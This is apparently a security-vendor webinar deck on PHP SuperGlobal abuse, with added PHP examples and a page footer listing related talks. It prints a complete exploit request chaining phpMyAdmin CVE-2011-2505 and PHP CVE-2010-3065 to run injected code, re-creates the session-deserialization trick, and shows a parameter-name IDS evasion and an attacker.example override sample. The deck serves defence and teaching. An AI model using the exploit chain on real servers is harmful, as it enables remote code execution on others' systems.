© 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals: Supersized Trouble
Confidential1
Tal Be’ery, Web Security Research Team Leader
Agenda
§  Introduction
•  Relevant PHP background
§  An anatomy of a modern web exploit
•  Abusing SuperGlobals
§  Additional PHP SuperGlobal attacks
•  In the wild
§  Summary & conclusions
§  Q&A
HII Reports
§  The Hacker Intelligence Initiative (HII) focuses on understanding how attackers operate in practice
•  A different approach from vulnerability research
§  Data set composition
•  ~60 real world applications
•  Anonymous Proxies
§  More than 24 months of data
§  Powerful analysis system
•  Combines analytic tools with drill down capabilities
Tal Be’ery, Web Research Team Leader
§  Web Security Research Team Leader at Imperva
§  Holds MSc & BSc degrees in CS/EE from TAU
§  10+ years of experience in the information security domain
§  Facebook “white hat”
§  Speaker at RSA, BlackHat, AusCERT
§  Columnist for securityweek.com
§  CISSP
Introduction
Relevant PHP Background
Breadth and Depth of PHP - I
§  The most popular server-side programming language in the world
§  And it goes from strength to strength
Breadth and Depth of PHP – II
§  The most popular web applications are powered by PHP
Source: http://www.alexa.com/topsites
PHP SuperGlobals
§  Most programming languages support different scopes for variables, primarily the “local” and the “global” scope.
§  Global variables
•  Provide a simple channel for cross-function communication
•  More risky, as *ANY* function may change them
§  PHP has several predefined variables called SuperGlobals.
§  SuperGlobals provide access to the server’s core functionality – cookies, sessions, environment, etc.
§  SuperGlobal variables are available to the PHP script in all scopes, with no need for an explicit global declaration inside functions.
PHP SuperGlobal List
 #  Variable    Definition
 1  $GLOBALS    References all variables available in global scope
 2  $_SERVER    Server and execution environment information
 3  $_GET       HTTP GET variables
 4  $_POST      HTTP POST variables
 5  $_FILES     HTTP file upload variables
 6  $_COOKIE    HTTP cookies
 7  $_SESSION   Session variables
 8  $_REQUEST   HTTP request variables (the merged contents of $_GET, $_POST and, depending on request_order, $_COOKIE)
 9  $_ENV       Environment variables
External Variable Modification: A PHP Specific Weakness
§  MITRE has assigned a specific CWE (Common Weakness Enumeration) entry to the External Variable Modification weakness: CWE-473
§  “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies”.
§  SuperGlobals are a natural target:
•  Exist in every PHP application
•  Provide access to the server’s core functionality
•  PHP does not let a request set them directly (a query parameter named _SESSION[x] lands in $_GET['_SESSION']['x']); the name only reaches the real SuperGlobal through code that imports request variables into scope, such as register_globals or a one-argument parse_str()
Anatomy of a Modern Web Exploit
Exploiting SuperGlobals
phpMyAdmin (PMA)
§  The most popular MySQL administration tool written in PHP
§  Often bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
CVE-2011-2505: phpMyAdmin Vulnerability
§  phpMyAdmin’s “unset session” functionality (the session_to_unset parameter handled by its Swekey authentication code)
§  parse_str(), called without a result array, parses the given query string and registers the variables in the current scope. As a result, *ALL* request variables are imported into the function’s local scope, under names chosen by the requester.
§  session_write_close() writes the current session data to storage and ends the session. With the default files handler, the data is implicitly written to a local file on the server.
CVE-2011-2505: Exploit
§  An attacker can now
•  Craft a malicious query string that names the _SESSION SuperGlobal
•  The injected _SESSION values override the session’s original values
•  The new values are saved to the session file on the server
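The pattern behind the two bullets above, as an added illustration that is not phpMyAdmin’s code: a one-argument parse_str() lets the requester choose which variables get assigned, and the two-argument form does not. The variable names, the query string and the sessionToUnset() helper are constructed for the demo. Note that the one-argument parse_str() form is deprecated since PHP 7.2 and removed in PHP 8.0, which is why the vulnerable branch is guarded and only runs on PHP 7.0 to 7.4.

```php
<?php
// Added illustration of the pattern behind CVE-2011-2505; this is not phpMyAdmin's
// code, and the variable names and query string are constructed. The one-argument
// parse_str() form is deprecated since PHP 7.2 and removed in PHP 8.0, so the
// vulnerable branch is guarded and only runs on older interpreters (PHP 7.0 to 7.4).

declare(strict_types=1);

$isAdmin = false;   // state the application trusts, fixed before user input is read

// Constructed attacker query string: a legitimate-looking parameter plus one whose
// *name* collides with the trusted variable.
$queryString = 'session_to_unset=123&isAdmin=1';

// Vulnerable pattern: parse_str() without a result array registers every name from
// the query string in the current scope, so the requester decides which variables
// get assigned. The exploit on this page used the same mechanism with the name
// "_SESSION[...]" to reach the session array.
if (PHP_VERSION_ID < 80000) {
    parse_str($queryString);
    var_dump($isAdmin);   // string(1) "1": the trusted variable was overwritten
}

// Hardened pattern: parse into a private array and pick out what you need; nothing
// leaks into scope. The session id is validated against the character set PHP's own
// session handler accepts, which also rules out path characters.
function sessionToUnset(string $qs): ?string
{
    parse_str($qs, $params);
    $sid = $params['session_to_unset'] ?? null;
    if (!is_string($sid) || preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $sid) !== 1) {
        return null;
    }
    return $sid;
}

var_dump(sessionToUnset($queryString));                          // string(3) "123"
var_dump(sessionToUnset('session_to_unset=../../etc/passwd'));   // NULL
var_dump(sessionToUnset('session_to_unset[]=123'));              // NULL (array, not a string)
```

The hardened helper is the shape of the upstream fix: the query string is parsed into a local array, and the one value the code needs is read out of it explicitly and validated before being handed to session_id().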
Serialization Explained
§  The process of converting data held in memory into a byte stream that can be saved to a file is called “serialization”
§  The reverse process, rebuilding in-memory data from the stored bytes, is called “deserialization”
Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
CVE-2010-3065: PHP Vulnerability & Exploit
§  Discovered by Stefan Esser in 2010; affects PHP 5.2 up to 5.2.13 and 5.3 up to 5.3.2
§  An attacker can write data to the session in *ANY* format if the session variable’s name starts with ‘!’, the marker the default session serializer uses for an undefined variable: on decode, the bytes that follow (the attacker’s value) are re-parsed as fresh name|value pairs
PMA Session Deserialization: Vulnerability
§  On session deserialization, the PMA_Config object is rebuilt and its load() function is called
§  Eval is evil!
•  load() hands the contents of the configured source file to eval(), so it can be used to execute unexpected code
§  But in order to exploit this, attackers first need to point source at a readable file whose content they control (= their own session file)
Guessing Session Filename: Theory
§  Luckily for the attacker, the location of the session file is predictable
§  The session file name consists of
•  The “sess_” prefix
•  The session identifier – known to the user/attacker (it is the value of their own session cookie)
§  The file’s directory is predictable too
•  It is whatever session.save_path points to, which is usually left at a well-known default (e.g. /tmp, or /var/lib/php5 on Debian and Ubuntu packages)
Guessing Session Filename: In the Wild
§  Multiple guesses for the path of the same session file (“sess_19qq…”)
The Final Exploit
§  Now the attackers can, *FINALLY*, get their code evaluated
§  /phpMyAdmin/index.php?session_to_unset=123
   &token=86498ff0a666f808df76ffaabee9b7a3
   &_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}
   &_SESSION[payload]=<?php phpinfo(); ?>
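Why the ‘!’ prefix from the CVE-2010-3065 slide turns the request above into a deserialized PMA_Config object, shown with an added example that is not code from this page, from PHP or from phpMyAdmin. It re-creates in userland the decode loop of PHP’s default “php” session serializer as it behaved before the fix (a record is a run of name|<serialized value> pairs, and a name prefixed with ‘!’ marks a variable that exists without a value) and runs it on a constructed copy of the attacker’s own session file. The class name PMA_Config and the sess_ path are taken from the exploit string; the file contents, and the helper names, are constructed here.

```php
<?php
// Added example; not code from this page, PHP or phpMyAdmin. Userland re-creation
// of the decode loop of PHP's default "php" session serializer as it behaved before
// the CVE-2010-3065 fix: a record is a run of name|<serialized value> pairs, and a
// name prefixed with '!' marks a variable that exists without a value. Run on a
// constructed record, it shows how the "!bla" variable of the exploit above makes a
// new variable "xxx" appear. PMA_Config and the sess_ path come from the exploit
// string; the session file contents are constructed.

function expectChar(string $buf, int $pos, string $ch): void
{
    if (($buf[$pos] ?? '') !== $ch) throw new RuntimeException("expected '$ch' at offset $pos");
}

// Decimal number at $pos terminated by ':'; returns [number, position after ':'].
function readNumber(string $buf, int $pos): array
{
    $end = strpos($buf, ':', $pos);
    if ($end === false || !ctype_digit(substr($buf, $pos, $end - $pos))) {
        throw new RuntimeException("bad number at offset $pos");
    }
    return [(int) substr($buf, $pos, $end - $pos), $end + 1];
}

// $count key/value pairs followed by '}', appended to $into; returns [array, position].
function readPairs(string $buf, int $pos, int $count, array $into): array
{
    for ($i = 0; $i < $count; $i++) {
        [$key, $pos] = readValue($buf, $pos);
        [$into[$key], $pos] = readValue($buf, $pos);
    }
    expectChar($buf, $pos, '}');
    return [$into, $pos + 1];
}

// One serialized value at $pos, consumed as php_var_unserialize() would, for the
// subset of the grammar the record needs (i, s, a, O). Objects come back as arrays
// tagged "__class" so nothing is instantiated. Throws where unserialize() would fail.
function readValue(string $buf, int $pos): array
{
    switch ($buf[$pos] ?? '') {
        case 'i':                                    // i:<digits>;
            $end = strpos($buf, ';', $pos);
            if ($end === false) throw new RuntimeException("unterminated int at $pos");
            return [(int) substr($buf, $pos + 2, $end - $pos - 2), $end + 1];
        case 's':                                    // s:<len>:"<bytes>";
            [$len, $p] = readNumber($buf, $pos + 2);
            expectChar($buf, $p, '"');
            expectChar($buf, $p + 1 + $len, '"');
            expectChar($buf, $p + 2 + $len, ';');
            return [substr($buf, $p + 1, $len), $p + 3 + $len];
        case 'a':                                    // a:<count>:{...}
            [$count, $p] = readNumber($buf, $pos + 2);
            expectChar($buf, $p, '{');
            return readPairs($buf, $p + 1, $count, []);
        case 'O':                                    // O:<len>:"<class>":<count>:{...}
            [$len, $p] = readNumber($buf, $pos + 2);
            expectChar($buf, $p, '"');
            expectChar($buf, $p + 2 + $len, ':');
            [$count, $p2] = readNumber($buf, $p + 3 + $len);
            expectChar($buf, $p2, '{');
            return readPairs($buf, $p2 + 1, $count, ['__class' => substr($buf, $p + 1, $len)]);
        default:
            throw new RuntimeException("unsupported type at offset $pos");
    }
}

// Pre-fix encoder: name|serialize(value) per variable, with no check on the name.
function encodeSessionRecord(array $vars): string
{
    $out = '';
    foreach ($vars as $name => $value) $out .= $name . '|' . serialize($value);
    return $out;
}

// Pre-fix decoder: the variables that would be loaded into $_SESSION.
function decodeSessionRecord(string $data): array
{
    $vars = [];
    for ($p = 0; $p < strlen($data) && ($q = strpos($data, '|', $p)) !== false; $p = $q) {
        $hasValue = $data[$p] !== '!';
        if (!$hasValue) $p++;                        // skip the undefined marker
        $name = substr($data, $p, $q - $p);
        $q++;                                        // step past '|'
        $vars[$name] = null;                         // the name is registered either way
        if ($hasValue) {
            try {
                [$vars[$name], $q] = readValue($data, $q);
            } catch (RuntimeException $e) {          // unserialize failed: no value, cursor stays
            }
        }
    }
    return $vars;
}

// Constructed contents of the attacker's own session file after the request on this
// page stored $_SESSION['!bla'] and $_SESSION['payload'].
$sessionFile = '/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62';
$injected = '|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'
          . strlen($sessionFile) . ':"' . $sessionFile . '";}}';
$record = encodeSessionRecord(['!bla' => $injected, 'payload' => '<?php phpinfo(); ?>']);
$loaded = decodeSessionRecord($record);

// No "!bla" survives; "xxx" now holds the attacker's object graph, whose "source"
// points back at this very session file, which also contains the payload.
var_dump(array_keys($loaded));                              // bla, s:..:", xxx, ";payload
var_dump($loaded['xxx'][0]['source'] === $sessionFile);     // bool(true)
```

The decoder never sees a string value for "!bla": the marker tells it there is no value, the cursor lands on the serialized string that follows, and the "|xxx|" inside that string is read as a fresh variable name whose value is the attacker’s serialized array. The fix that shipped in PHP 5.2.14 and 5.3.3 closed this on the encoder side, which now refuses to write a session variable whose name contains ‘|’ or ‘!’.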
Exploit Result
§  Arbitrary PHP code is executed
PMA SuperGlobal Attacks In the Wild
§  The attack source is itself a hacked server
§  It attacks (at least) two other servers
§  The attacks persist over half a year
A Modern Exploit Summary: Research
§  Sophisticated research
§  Combines multiple vulnerabilities and issues in multiple
domains
•  PHPMyAdmin (PMA)
•  PHP internals
A Modern Exploit Summary: Development
§  Exploit packed in a single, “click once” PHP script
§  Automates the different attack stages
§  Can be launched from infected servers to infect others
Additional PHP SuperGlobal Attacks
In the Wild
SuperGlobal Attacks Targets – I
§  Exploits of specific vulnerabilities – such as the previously discussed PMA attack
§  RFI (Remote File Inclusion): trying to overwrite _SERVER[DOCUMENT_ROOT] so that include paths built from it point to an external resource
SuperGlobal Attacks Targets – II
§  Part of general scanning against the site – Nikto, Acunetix, Nessus
§  IDS filter evasion: SuperGlobals provide an alternative way to represent HTTP query parameters
•  For code that imports request variables into scope (register_globals, one-argument parse_str() and the like), the “_REQUEST[Itemid]=1” request parameter ends up setting the same variable as “Itemid=1”
•  However, it evades a naïve IDS signature that blacklists “Itemid=1”
•  We have seen this evasion technique applied on several CVEs
SuperGlobals In the Wild
§  During May 2013:
•  3.5K requests that manipulated PHP SuperGlobal variables
•  27 different attack sources
•  24 web applications as targets
Targeted SuperGlobals
§  Some SuperGlobals are more targeted than others
§  The more targeted SuperGlobals provide access to more sensitive resources
§  Share of attack requests by targeted SuperGlobal (pie chart):
•  GLOBALS: 55%
•  ENV: 14%
•  SERVER: 14%
•  SESSION: 13%
•  REQUEST: 4%
Summary & Conclusions
The Importance of a Positive Security Model
§  The essence of the external variable manipulation weakness: the attacker can send external parameters with the same names as internal variables, and thus override the values of the latter.
§  External parameters are not part of the standard interface of the targeted application
§  Blocking all of the internal variables’ names is difficult with a negative security approach (a blacklist would have to enumerate every internal name)
§  But it is trivial with a positive security mechanism that specifies the allowed parameter names for each resource and rejects everything else
Layered Application Layer Mechanisms
§  Bad news: attackers can create a complex exploit by combining several vulnerabilities together
§  Good news: it’s enough to break one of the links in the kill chain to break the chain altogether.
§  An application layer solution should therefore combine multiple detection mechanisms:
•  Positive security model
•  Negative security model for generic issues (generic directory traversal protection in this case)
•  Specific CVE detection, which is crucial for effective mitigation of such complex attacks
Third-Party Code Perils
§  Attackers target popular applications such as the phpMyAdmin (PMA) utility.
§  PMA is often bundled with other applications.
§  Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks.
§  Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed: protection that is in place by default rather than enabled per application.
§  A way to achieve such an “opt out” security model is by deploying a Web Application Firewall (WAF) with constant updates of security content.
SuperGlobal Parameters In Requests Should Be Blocked
§  There is no reason for these parameters to be present in valid requests, so they should be banned.
§  Imperva’s WAF customers received a content update to their Web Application Firewall on January 15th 2013.
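What the three recommendations (the positive model, normalising the “_REQUEST[Itemid]” spelling before signature matching, and banning SuperGlobal-named parameters outright) look like as one check, shown with an added example that is neither Imperva’s nor any WAF’s code: an application-side guard a PHP front controller could run before routing. The resource paths, the allowlist, the helper names and the sample requests are all constructed for the demo.

```php
<?php
// Added example, not Imperva's or any WAF's code: an application-side guard that a
// PHP front controller could run before routing, implementing the three points
// above: reject any request parameter whose name is a PHP SuperGlobal, fold the
// "_REQUEST[Itemid]" spelling back to the plain name before signature matching, and
// enforce a positive model (an allowlist of parameter names per resource). The
// resource paths, the allowlist and the sample requests are constructed for the demo.

declare(strict_types=1);

const SUPERGLOBAL_NAMES = ['GLOBALS', '_SERVER', '_GET', '_POST', '_FILES',
                           '_COOKIE', '_SESSION', '_REQUEST', '_ENV'];

// Positive security model: the only parameter names each resource accepts.
const ALLOWED_PARAMS = [
    '/index.php' => ['option', 'view', 'Itemid'],
    '/login.php' => ['username', 'password', 'token'],
];

// Top-level name of a parameter: "_SESSION[!bla]" -> "_SESSION", "Itemid" -> "Itemid".
function baseName(string $rawName): string
{
    return (string) preg_replace('/\[.*\z/s', '', $rawName);
}

// Canonical name for signature matching: "_REQUEST[Itemid]" -> "Itemid",
// "GLOBALS[cfg][dir]" -> "cfg"; any other name is returned unchanged.
function canonicalName(string $rawName): string
{
    if (in_array(baseName($rawName), SUPERGLOBAL_NAMES, true)
        && preg_match('/\A[^\[]+\[([^\]]*)\]/', $rawName, $m) === 1) {
        return $m[1];
    }
    return $rawName;
}

// Inspect the raw query string (before PHP turns "_SESSION[!bla]" into
// $_GET['_SESSION']['!bla']). Returns the findings; an empty list means the
// request passes both checks.
function inspectRequest(string $path, string $query): array
{
    $findings = [];
    $allowed = ALLOWED_PARAMS[$path] ?? [];
    foreach (explode('&', $query) as $pair) {
        if ($pair === '') {
            continue;
        }
        $name = urldecode(explode('=', $pair, 2)[0]);
        if (in_array(baseName($name), SUPERGLOBAL_NAMES, true)) {
            $findings[] = "superglobal parameter '$name'";           // block outright
        }
        $canonical = canonicalName($name);                            // what a signature sees
        if (!in_array($canonical, $allowed, true)) {
            $findings[] = "parameter '$canonical' not allowed for $path";
        }
    }
    return $findings;
}

// Constructed sample requests.
$samples = [
    ['/index.php', 'option=com_content&Itemid=1'],               // clean
    ['/index.php', '_REQUEST[Itemid]=1'],                         // evasion spelling
    ['/index.php', 'session_to_unset=123&_SESSION[!bla]=x'],      // shape of the PMA exploit
    ['/index.php', 'GLOBALS[cfg][dir]=http://attacker.example/'], // override attempt
];
foreach ($samples as [$path, $query]) {
    $findings = inspectRequest($path, $query);
    printf("%-55s %s\n", "$path?$query", $findings ? implode('; ', $findings) : 'pass');
}
```

The first sample passes; the second is caught by the SuperGlobal ban even though its canonical name, Itemid, is on the allowlist, which is exactly the case a signature written for “Itemid=1” would otherwise miss; the third and fourth are flagged by both checks. Inspecting the raw query string rather than $_GET matters because PHP has already rewritten “_SESSION[!bla]” into a nested array key by the time application code runs.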
Summing Up
§  Establish a positive security model
§  Use layered application layer security mechanisms
§  Beware of third-party code perils
§  Block SuperGlobal parameters in requests
Webinar Materials
§  Post-webinar discussions
§  Answers to attendee questions
§  Webinar recording link
§  Join the Imperva LinkedIn group, Imperva Data Security Direct, for…
www.imperva.com

More Related Content

What's hot

CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat Security Conference
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 

What's hot (20)

Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Shamoon
ShamoonShamoon
Shamoon
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Red Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSRed Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWS
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
 

Similar to PHP SuperGlobals: Supersized Trouble

Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
WilheminaRossi174
 

Similar to PHP SuperGlobals: Supersized Trouble (20)

Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known Vulnerabilities
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Runtime Protection in the Real World
Runtime Protection in the Real WorldRuntime Protection in the Real World
Runtime Protection in the Real World
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
 
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 
Securing Java in the Server Room
Securing Java in the Server RoomSecuring Java in the Server Room
Securing Java in the Server Room
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
 
The Top 10 Most Common Weaknesses in Serverless Applications 2018
The Top 10 Most Common Weaknesses in Serverless Applications 2018The Top 10 Most Common Weaknesses in Serverless Applications 2018
The Top 10 Most Common Weaknesses in Serverless Applications 2018
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
 
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
 

More from Imperva

More from Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2: New attacks on the Internet’s Next Generation FoundationHacking HTTP/2: New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 

Recently uploaded

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
